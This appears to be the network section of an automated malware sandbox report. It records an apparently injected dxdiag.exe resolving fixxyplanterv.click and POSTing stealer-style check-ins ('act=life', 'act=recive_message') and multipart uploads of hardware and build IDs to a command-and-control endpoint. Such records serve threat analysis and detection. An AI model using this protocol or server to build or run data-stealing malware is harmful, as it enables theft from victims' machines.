                                                                                                              Jan 13, 2025 08:34:51.433725119 CET49719443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:51.433731079 CET44349719104.21.6.116192.168.2.8
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 13, 2025 08:34:39.726655006 CET6033653192.168.2.81.1.1.1
                                                                                                              Jan 13, 2025 08:34:39.739104033 CET53603361.1.1.1192.168.2.8
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 13, 2025 08:34:39.726655006 CET192.168.2.81.1.1.10x47aStandard query (0)fixxyplanterv.clickA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 13, 2025 08:34:39.739104033 CET1.1.1.1192.168.2.80x47aNo error (0)fixxyplanterv.click104.21.6.116A (IP address)IN (0x0001)false
                                                                                                              Jan 13, 2025 08:34:39.739104033 CET1.1.1.1192.168.2.80x47aNo error (0)fixxyplanterv.click172.67.134.197A (IP address)IN (0x0001)false
                                                                                                              • fixxyplanterv.click
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.849707104.21.6.1164431984C:\Windows\SysWOW64\dxdiag.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-13 07:34:40 UTC266OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 8
                                                                                                              Host: fixxyplanterv.click
                                                                                                              2025-01-13 07:34:40 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                              Data Ascii: act=life
                                                                                                              2025-01-13 07:34:40 UTC1131INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 13 Jan 2025 07:34:40 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=pffoekvm50i8np91fuma4mtto5; expires=Fri, 09 May 2025 01:21:19 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FBrJxP3SFF11I2yAAIpm66kV23mP%2Bqo7q%2F%2F0s9OvySoLtv4hLebGY6qubvSSZrRO5KgJautrhHPUKCQGJeQY6pFc%2Fu6As9PTPsV62%2BmFRrF2eF6LUrJAlVwSoDk03%2FyDiIGMGBh5"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9013b48749cc4263-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1571&rtt_var=607&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1778319&cwnd=247&unsent_bytes=0&cid=74869f08dca5464f&ts=699&x=0"
                                                                                                              2025-01-13 07:34:40 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                              Data Ascii: 2ok
                                                                                                              2025-01-13 07:34:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.849708104.21.6.1164431984C:\Windows\SysWOW64\dxdiag.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-13 07:34:41 UTC267OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 45
                                                                                                              Host: fixxyplanterv.click
                                                                                                              2025-01-13 07:34:41 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d
                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=ZqchOa--new&j=
                                                                                                              2025-01-13 07:34:42 UTC1127INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 13 Jan 2025 07:34:41 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=gs34rk0eilq3s5h1r6i73927ba; expires=Fri, 09 May 2025 01:21:20 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k8KDdjinJKd9wT1%2BJGH5u5jwWloVofMEiN0rjNk%2Bf5YzKUeorU1HMf5lzExP%2FqSvX9JwH7hKFk0CaNNRRy0WfNKPAsjGsyTrKOtnxcGNC8EhCcvI9uM%2FsSlHZJ1bAWzjt6MujOsQ"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9013b48e595a9e16-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1793&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=948&delivery_rate=1595628&cwnd=190&unsent_bytes=0&cid=ab50287445fbf399&ts=491&x=0"
                                                                                                              2025-01-13 07:34:42 UTC242INData Raw: 34 39 39 34 0d 0a 62 41 6d 6b 4f 70 64 65 6b 49 36 54 75 6e 76 58 46 4f 54 6f 73 42 50 6f 36 2b 34 56 35 44 65 76 63 38 62 79 76 68 5a 6b 53 32 55 58 4b 39 49 59 72 57 71 38 72 4f 44 66 57 65 31 67 6c 70 33 56 50 38 71 4b 69 6a 66 65 55 63 34 66 74 5a 65 53 4e 42 49 6d 52 31 5a 76 78 56 62 6b 4f 37 79 73 39 73 4a 5a 37 55 2b 66 79 74 56 39 79 74 48 4d 63 49 35 56 7a 68 2b 6b 6b 39 56 35 46 43 63 47 42 47 58 44 55 76 49 39 39 4f 2f 2f 31 78 36 79 63 59 57 43 33 6e 71 46 67 34 4d 33 79 42 58 4b 43 65 54 49 6e 46 73 42 50 77 51 68 61 4e 64 52 74 53 4f 38 39 62 48 66 46 66 55 75 78 6f 6e 56 63 59 53 4e 69 6e 36 4d 58 38 63 58 70 5a 62 55 5a 67 30 74 44 51 52 72 77 46 50 34 4e 4f 44 69 39 64 41 56 74 48 75 46 79 70 77 78
                                                                                                              Data Ascii: 4994bAmkOpdekI6TunvXFOTosBPo6+4V5Devc8byvhZkS2UXK9IYrWq8rODfWe1glp3VP8qKijfeUc4ftZeSNBImR1ZvxVbkO7ys9sJZ7U+fytV9ytHMcI5Vzh+kk9V5FCcGBGXDUvI99O//1x6ycYWC3nqFg4M3yBXKCeTInFsBPwQhaNdRtSO89bHfFfUuxonVcYSNin6MX8cXpZbUZg0tDQRrwFP4NODi9dAVtHuFypwx
                                                                                                              2025-01-13 07:34:42 UTC1369INData Raw: 6a 5a 48 4d 4c 38 59 47 2f 78 4b 31 67 63 6c 35 46 69 39 48 45 53 58 66 47 50 49 77 73 72 53 78 30 42 57 37 63 34 57 46 31 58 43 4b 6d 34 4e 33 68 56 33 46 46 61 36 66 30 33 73 49 49 77 41 47 59 73 46 58 38 6a 54 30 34 2f 4b 59 56 2f 56 78 6e 73 71 4b 4d 61 71 5a 6a 33 53 53 57 4e 78 52 75 39 37 46 4e 41 45 6c 52 31 59 72 77 46 62 30 4d 66 4c 2b 2b 64 4d 53 73 47 53 4e 67 39 39 38 69 6f 53 47 65 49 56 56 79 68 75 75 6e 39 5a 77 43 79 51 42 44 6d 75 47 46 72 55 37 36 71 79 70 6d 44 71 77 5a 6f 47 47 78 44 4f 77 79 5a 4d 35 6e 78 58 4b 48 65 54 49 6e 48 77 44 4b 67 51 46 5a 4d 56 51 2f 69 37 79 2f 76 66 56 48 4b 64 77 67 34 54 59 63 70 69 44 67 6e 47 46 58 4d 59 59 6f 5a 66 59 4e 45 68 70 41 42 59 72 6e 68 6a 55 4d 66 6e 67 2b 38 38 5a 39 57 6e 49 6b 35 4a
                                                                                                              Data Ascii: jZHML8YG/xK1gcl5Fi9HESXfGPIwsrSx0BW7c4WF1XCKm4N3hV3FFa6f03sIIwAGYsFX8jT04/KYV/VxnsqKMaqZj3SSWNxRu97FNAElR1YrwFb0MfL++dMSsGSNg998ioSGeIVVyhuun9ZwCyQBDmuGFrU76qypmDqwZoGGxDOwyZM5nxXKHeTInHwDKgQFZMVQ/i7y/vfVHKdwg4TYcpiDgnGFXMYYoZfYNEhpABYrnhjUMfng+88Z9WnIk5J
                                                                                                              2025-01-13 07:34:42 UTC1369INData Raw: 6e 47 4a 57 4d 46 52 36 74 44 62 62 45 5a 78 52 79 52 6f 30 6c 76 2f 66 73 66 76 2f 39 59 65 6f 7a 61 5a 78 4d 73 78 6a 59 58 4d 4c 38 5a 59 7a 42 6d 69 67 74 4e 35 42 53 63 4a 41 57 37 4a 55 50 55 38 2f 2b 6e 31 30 78 4b 32 65 34 4b 59 32 48 47 43 6a 49 31 39 6a 42 57 44 55 61 4f 49 6e 43 78 47 47 42 41 46 4b 66 4e 62 2b 7a 4c 31 2b 72 48 48 56 36 77 32 67 59 61 53 4b 63 71 45 68 48 4b 44 57 73 77 62 71 70 58 57 65 41 34 6e 42 42 78 6b 77 6c 6a 35 4e 50 6a 68 2f 39 77 52 76 48 32 4e 6a 4e 4a 77 67 4d 6e 43 4e 34 46 4e 6a 55 6e 6b 70 4e 74 34 43 79 5a 46 4f 32 6a 49 56 76 49 71 73 76 4f 2f 77 56 6d 79 65 73 62 53 6b 6e 32 44 69 59 64 39 67 6c 58 4b 48 4b 47 54 32 33 63 4c 4c 67 30 41 62 4d 4a 55 2f 44 48 30 37 50 62 63 48 4b 64 7a 6a 34 62 65 4d 63 54 4a
                                                                                                              Data Ascii: nGJWMFR6tDbbEZxRyRo0lv/fsfv/9YeozaZxMsxjYXML8ZYzBmigtN5BScJAW7JUPU8/+n10xK2e4KY2HGCjI19jBWDUaOInCxGGBAFKfNb+zL1+rHHV6w2gYaSKcqEhHKDWswbqpXWeA4nBBxkwlj5NPjh/9wRvH2NjNJwgMnCN4FNjUnkpNt4CyZFO2jIVvIqsvO/wVmyesbSkn2DiYd9glXKHKGT23cLLg0AbMJU/DH07PbcHKdzj4beMcTJ
                                                                                                              2025-01-13 07:34:42 UTC1369INData Raw: 76 55 55 61 4f 63 6e 43 78 47 49 41 34 63 5a 63 68 52 2b 44 72 36 36 2f 2f 56 45 72 4e 39 67 59 33 55 66 49 4b 45 69 58 53 48 55 63 63 44 70 35 76 57 65 51 78 70 53 55 35 73 33 68 69 74 66 4e 58 67 32 4d 67 43 70 32 44 47 6c 5a 78 6f 79 6f 36 41 4e 39 34 56 7a 68 36 74 6e 39 52 38 43 53 59 44 41 47 33 41 56 66 41 7a 2b 50 37 35 31 68 53 2b 65 59 32 59 30 6e 79 4f 68 59 68 2f 6a 56 2b 4e 58 2b 53 58 78 44 52 65 61 54 49 44 5a 4d 5a 62 34 33 7a 74 6f 75 69 59 48 72 6b 32 33 73 72 65 66 34 71 47 67 48 75 4e 58 63 77 64 71 70 66 5a 66 51 34 68 46 51 39 76 7a 6c 6e 37 4d 2f 50 6f 39 4e 30 64 73 6e 4b 41 68 5a 49 2f 79 6f 36 55 4e 39 34 56 34 6a 61 52 30 76 31 4f 52 6a 5a 4a 46 79 76 42 56 4c 56 6b 73 75 44 79 31 42 47 36 63 49 2b 47 32 48 69 42 68 59 64 7a 69
                                                                                                              Data Ascii: vUUaOcnCxGIA4cZchR+Dr66//VErN9gY3UfIKEiXSHUccDp5vWeQxpSU5s3hitfNXg2MgCp2DGlZxoyo6AN94Vzh6tn9R8CSYDAG3AVfAz+P751hS+eY2Y0nyOhYh/jV+NX+SXxDReaTIDZMZb43ztouiYHrk23sref4qGgHuNXcwdqpfZfQ4hFQ9vzln7M/Po9N0dsnKAhZI/yo6UN94V4jaR0v1ORjZJFyvBVLVksuDy1BG6cI+G2HiBhYdzi
                                                                                                              2025-01-13 07:34:42 UTC1369INData Raw: 72 6b 64 31 79 46 43 34 4f 48 47 58 4c 56 2f 30 30 2b 2b 33 31 33 52 53 7a 65 6f 79 4c 31 58 2b 45 67 63 77 35 78 6c 4c 56 55 66 7a 51 2f 57 51 64 4f 78 45 44 53 73 74 58 74 53 4f 38 39 62 48 66 46 66 55 75 78 6f 50 41 64 59 65 62 68 58 43 49 57 73 34 44 70 5a 33 58 5a 67 45 6d 41 77 6c 6e 77 46 66 7a 50 66 66 6d 2f 64 38 63 76 6e 6d 4b 79 70 77 78 6a 5a 48 4d 4c 38 5a 37 78 67 4b 7a 6b 39 4a 2f 45 44 4a 48 45 53 58 66 47 50 49 77 73 72 53 78 32 78 4b 2b 63 6f 61 47 30 6e 57 48 69 5a 35 34 67 56 4c 45 47 72 61 61 32 33 4d 4e 49 51 77 42 62 64 52 55 2b 79 37 33 2f 75 4f 59 56 2f 56 78 6e 73 71 4b 4d 62 79 4f 6e 47 65 46 46 2f 77 48 70 34 62 58 65 51 70 70 47 45 42 79 68 6c 2f 35 66 4b 71 73 39 39 63 51 74 6e 6d 48 67 39 35 38 6a 34 43 4a 64 6f 42 52 78 78
                                                                                                              Data Ascii: rkd1yFC4OHGXLV/00++313RSzeoyL1X+Egcw5xlLVUfzQ/WQdOxEDSstXtSO89bHfFfUuxoPAdYebhXCIWs4DpZ3XZgEmAwlnwFfzPffm/d8cvnmKypwxjZHML8Z7xgKzk9J/EDJHESXfGPIwsrSx2xK+coaG0nWHiZ54gVLEGraa23MNIQwBbdRU+y73/uOYV/VxnsqKMbyOnGeFF/wHp4bXeQppGEByhl/5fKqs99cQtnmHg958j4CJdoBRxx
                                                                                                              2025-01-13 07:34:42 UTC1369INData Raw: 4e 42 6c 6e 48 6b 35 73 79 68 69 74 66 50 48 72 38 74 6b 54 76 48 71 4a 6a 64 5a 6a 67 49 36 65 64 6f 64 65 77 42 32 6b 6e 64 46 2b 42 79 41 4b 41 6d 62 42 58 2f 6f 35 73 71 4b 78 33 77 48 31 4c 73 61 72 33 33 71 47 30 74 59 33 6d 52 76 55 55 61 4f 63 6e 43 78 47 4b 51 30 4c 59 63 74 62 2b 6a 2f 67 37 66 66 4b 47 62 68 38 6c 49 44 5a 64 49 65 45 67 58 53 41 55 38 59 64 74 70 6e 63 64 77 31 70 53 55 35 73 33 68 69 74 66 4e 48 37 35 39 49 65 75 57 43 4e 69 39 46 6e 68 35 6e 4d 4f 63 5a 45 79 67 44 6b 79 4d 70 6b 45 53 34 59 51 48 4b 47 58 2f 6c 38 71 71 7a 33 30 52 2b 79 63 49 69 59 31 33 65 46 68 6f 56 2b 67 6c 33 4f 45 61 43 55 32 33 45 46 4a 51 77 4a 61 4d 6c 63 2f 44 4c 37 34 37 47 57 57 62 4a 75 78 74 4b 53 55 4a 47 4b 67 48 72 47 53 6f 4d 49 35 4a 66
                                                                                                              Data Ascii: NBlnHk5syhitfPHr8tkTvHqJjdZjgI6edodewB2kndF+ByAKAmbBX/o5sqKx3wH1Lsar33qG0tY3mRvUUaOcnCxGKQ0LYctb+j/g7ffKGbh8lIDZdIeEgXSAU8Ydtpncdw1pSU5s3hitfNH759IeuWCNi9Fnh5nMOcZEygDkyMpkES4YQHKGX/l8qqz30R+ycIiY13eFhoV+gl3OEaCU23EFJQwJaMlc/DL747GWWbJuxtKSUJGKgHrGSoMI5Jf
                                                                                                              2025-01-13 07:34:42 UTC1369INData Raw: 55 64 57 4b 2b 5a 54 34 7a 6e 31 2b 72 50 74 47 72 74 34 67 5a 79 53 62 72 58 48 7a 48 69 63 46 5a 55 6f 76 64 44 62 65 45 5a 78 52 78 74 73 78 6c 2f 76 4b 76 58 67 34 4e 4d 55 75 56 53 4a 6a 63 52 79 68 59 71 64 66 73 70 65 77 46 48 71 30 4e 74 73 52 6e 46 48 49 57 7a 51 57 39 6f 2f 34 2b 57 78 6c 6c 6d 79 59 4d 62 53 6b 6b 2f 4b 6d 34 39 6e 68 56 72 63 4c 2b 54 49 78 55 70 47 49 68 45 4a 65 38 56 4f 2f 6a 48 2b 2f 63 2b 59 51 65 45 6b 31 4e 69 41 49 35 58 4a 6b 30 6a 49 46 63 78 52 2f 4b 6e 46 4e 42 42 70 58 31 77 6c 68 6b 71 31 5a 4c 4b 72 38 73 6f 4c 73 33 57 51 69 5a 56 50 74 4b 36 61 66 59 46 46 79 67 61 72 30 4a 49 30 43 57 6c 66 4e 79 76 50 58 2b 34 74 35 4f 48 68 33 31 6d 4b 4f 4d 61 53 6b 69 6e 4b 76 49 39 35 69 46 4c 62 41 4f 6d 33 79 6e 34 42
                                                                                                              Data Ascii: UdWK+ZT4zn1+rPtGrt4gZySbrXHzHicFZUovdDbeEZxRxtsxl/vKvXg4NMUuVSJjcRyhYqdfspewFHq0NtsRnFHIWzQW9o/4+WxllmyYMbSkk/Km49nhVrcL+TIxUpGIhEJe8VO/jH+/c+YQeEk1NiAI5XJk0jIFcxR/KnFNBBpX1wlhkq1ZLKr8soLs3WQiZVPtK6afYFFygar0JI0CWlfNyvPX+4t5OHh31mKOMaSkinKvI95iFLbAOm3yn4B
                                                                                                              2025-01-13 07:34:42 UTC1369INData Raw: 65 47 46 72 55 70 2b 65 44 33 31 51 7a 36 5a 35 43 4a 78 48 62 47 67 5a 31 36 69 68 58 79 58 2b 53 49 6e 43 78 47 48 41 51 41 5a 63 46 4f 35 48 48 53 35 2f 33 62 46 62 52 78 78 73 53 53 64 38 72 52 33 7a 6e 47 55 64 78 52 2f 4d 43 4f 4c 31 4e 36 55 46 34 35 32 52 62 73 66 4f 53 73 71 59 70 58 39 57 54 47 30 70 49 32 69 5a 75 65 63 59 56 44 7a 6c 61 61 72 74 31 35 43 57 55 4a 42 57 76 42 53 4f 4d 6e 76 75 54 79 77 67 4f 4c 53 4b 32 47 31 48 61 51 6a 6f 70 52 70 68 57 44 55 61 76 51 68 45 31 47 59 55 63 78 4a 59 5a 41 74 57 53 79 32 66 4c 57 46 37 4a 67 6c 38 66 36 55 72 43 7a 7a 6c 75 42 51 49 38 6c 6f 34 44 4e 66 77 73 6c 52 30 41 72 77 42 69 74 62 4c 79 73 39 63 6c 5a 37 53 62 55 30 59 63 69 33 64 6e 65 61 4d 68 4d 6a 51 66 6b 79 49 34 36 52 6a 74 48 56
                                                                                                              Data Ascii: eGFrUp+eD31Qz6Z5CJxHbGgZ16ihXyX+SInCxGHAQAZcFO5HHS5/3bFbRxxsSSd8rR3znGUdxR/MCOL1N6UF452RbsfOSsqYpX9WTG0pI2iZuecYVDzlaart15CWUJBWvBSOMnvuTywgOLSK2G1HaQjopRphWDUavQhE1GYUcxJYZAtWSy2fLWF7Jgl8f6UrCzzluBQI8lo4DNfwslR0ArwBitbLys9clZ7SbU0Yci3dneaMhMjQfkyI46RjtHV
                                                                                                              2025-01-13 07:34:42 UTC1369INData Raw: 74 62 37 79 73 34 35 68 42 39 54 47 49 68 39 4e 79 68 49 71 65 5a 59 42 57 32 78 4c 6a 72 75 4a 52 43 79 51 43 41 47 7a 34 5a 74 51 32 34 75 48 2b 33 31 75 56 63 5a 43 4a 37 45 2b 39 6d 49 74 6e 78 48 50 4f 42 36 66 51 6b 6a 51 65 61 56 39 4f 53 73 78 49 2b 44 50 31 72 74 48 66 44 37 59 32 79 4d 72 57 4d 64 4c 4a 71 58 71 4c 55 4d 4d 57 35 72 48 57 5a 41 73 6d 41 45 78 4c 77 55 37 32 66 4c 79 73 2f 5a 68 42 39 58 65 4d 6d 74 39 2b 6a 63 57 4c 62 59 45 56 67 31 47 71 30 49 51 30 42 79 4d 58 41 32 54 42 46 50 4d 79 2f 4b 7a 75 6c 67 44 31 59 4d 62 53 67 54 2f 4b 6d 38 77 76 78 68 4c 4f 41 37 61 57 33 32 49 46 62 6a 6b 77 52 74 52 66 35 54 2b 77 33 66 7a 63 44 36 42 31 6c 6f 33 73 54 36 65 62 69 32 65 46 46 2f 77 48 70 35 44 53 63 30 5a 6e 52 78 59 72 6e 68
                                                                                                              Data Ascii: tb7ys45hB9TGIh9NyhIqeZYBW2xLjruJRCyQCAGz4ZtQ24uH+31uVcZCJ7E+9mItnxHPOB6fQkjQeaV9OSsxI+DP1rtHfD7Y2yMrWMdLJqXqLUMMW5rHWZAsmAExLwU72fLys/ZhB9XeMmt9+jcWLbYEVg1Gq0IQ0ByMXA2TBFPMy/KzulgD1YMbSgT/Km8wvxhLOA7aW32IFbjkwRtRf5T+w3fzcD6B1lo3sT6ebi2eFF/wHp5DSc0ZnRxYrnh


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.849709104.21.6.1164431984C:\Windows\SysWOW64\dxdiag.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-13 07:34:42 UTC281OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=TP4A0GOX3LS9EZ
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 12820
                                                                                                              Host: fixxyplanterv.click
                                                                                                              2025-01-13 07:34:42 UTC12820OUTData Raw: 2d 2d 54 50 34 41 30 47 4f 58 33 4c 53 39 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 30 38 39 41 41 35 35 31 45 43 43 45 44 34 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 54 50 34 41 30 47 4f 58 33 4c 53 39 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 50 34 41 30 47 4f 58 33 4c 53 39 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 54 50 34 41 30 47 4f 58 33 4c
                                                                                                              Data Ascii: --TP4A0GOX3LS9EZContent-Disposition: form-data; name="hwid"FD089AA551ECCED45EC6468C5C963249--TP4A0GOX3LS9EZContent-Disposition: form-data; name="pid"2--TP4A0GOX3LS9EZContent-Disposition: form-data; name="lid"ZqchOa--new--TP4A0GOX3L
                                                                                                              2025-01-13 07:34:43 UTC1140INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 13 Jan 2025 07:34:43 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=mrigcvt9jpoi5s06nqofjjr005; expires=Fri, 09 May 2025 01:21:21 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2Fr%2FcYDUHDmlgO9vyq2oCUcpGbSELcD1J8J6x7D%2BcTq4cGRJB9t%2BwRF7Y7DbC8yVvqI0oPFcXE9%2BbfjNbRmIZtqIUTpuf%2Fncd1QMd%2FPpsEWrjJqb%2F459xC4K%2BXXH3zYCFkutf4OZ"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9013b4957f9a5e67-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1653&rtt_var=633&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13759&delivery_rate=1711606&cwnd=245&unsent_bytes=0&cid=4252184c561cc7c1&ts=412&x=0"
                                                                                                              2025-01-13 07:34:43 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-13 07:34:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.849710104.21.6.1164431984C:\Windows\SysWOW64\dxdiag.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-13 07:34:43 UTC279OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=HS01DAG7DF0S
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 15037
                                                                                                              Host: fixxyplanterv.click
                                                                                                              2025-01-13 07:34:43 UTC15037OUTData Raw: 2d 2d 48 53 30 31 44 41 47 37 44 46 30 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 30 38 39 41 41 35 35 31 45 43 43 45 44 34 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 48 53 30 31 44 41 47 37 44 46 30 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 53 30 31 44 41 47 37 44 46 30 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 48 53 30 31 44 41 47 37 44 46 30 53 0d 0a 43 6f
                                                                                                              Data Ascii: --HS01DAG7DF0SContent-Disposition: form-data; name="hwid"FD089AA551ECCED45EC6468C5C963249--HS01DAG7DF0SContent-Disposition: form-data; name="pid"2--HS01DAG7DF0SContent-Disposition: form-data; name="lid"ZqchOa--new--HS01DAG7DF0SCo
                                                                                                              2025-01-13 07:34:44 UTC1130INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 13 Jan 2025 07:34:44 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=bt0gp9p6ilahulrcart1vtojus; expires=Fri, 09 May 2025 01:21:23 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FGPjhnsLW7zWzQQzG573%2FDMXZwBi6oNAoBPmC3sXxpdZOlyy%2FIovRoYwc2rGRVYh%2BYWbd5FGwiJP9uh3VL6Vx8lTkMGU0jiD1pVOUw0dmjcW4XEocmiSOQB6C7fK%2Bla6bt0gREJS"}],"group":"cf-nel","max_age":604800}
